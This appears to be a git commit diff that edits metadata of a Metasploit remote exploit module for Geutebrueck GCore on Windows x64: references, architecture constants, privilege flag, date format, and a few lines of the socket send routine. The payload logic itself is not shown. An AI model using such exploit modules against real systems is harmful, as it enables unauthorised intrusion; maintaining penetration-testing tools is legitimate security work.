parent
d5fd620fbb
commit
c187f709dc
|
@ -3,7 +3,6 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
require 'nokogiri'
|
||||
require 'open-uri'
|
||||
|
||||
|
@ -24,21 +23,22 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
],
|
||||
'References' =>
|
||||
[
|
||||
['www.geutebrueck.com', '']
|
||||
['EDB','41153'],
|
||||
['URL','www.geutebrueck.com']
|
||||
],
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
['Automatic Targeting', { 'auto' => true, 'Arch' => ARCH_X86_64 }],
|
||||
['GCore 1.3.8.42, Windows x64 (Win7, Win8/8.1, Win2012R2,...)', { 'Arch' => ARCH_X86_64 }],
|
||||
['GCore 1.4.2.37, Windows x64 (Win7, Win8/8.1, Win2012R2,...)', { 'Arch' => ARCH_X86_64 }]
|
||||
['Automatic Targeting', { 'auto' => true, 'Arch' => ARCH_X64 }],
|
||||
['GCore 1.3.8.42, Windows x64 (Win7, Win8/8.1, Win2012R2,...)', { 'Arch' => ARCH_X64}],
|
||||
['GCore 1.4.2.37, Windows x64 (Win7, Win8/8.1, Win2012R2,...)', { 'Arch' => ARCH_X64}]
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => '2000'
|
||||
},
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => '2017-01-24',
|
||||
'Privileged' => true,
|
||||
'DisclosureDate' => 'Jan 24 2017',
|
||||
'DefaultTarget' => 0))
|
||||
end
|
||||
|
||||
|
@ -272,7 +272,6 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
print_status('Exploit ready for sending...')
|
||||
sock.put(exploit, 'Timeout' => 20)
|
||||
print_status('Exploit sent!')
|
||||
# sleep(10)
|
||||
buf = sock.get_once || ''
|
||||
rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
|
||||
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
|
||||
|
|
Loading…
Reference in New Issue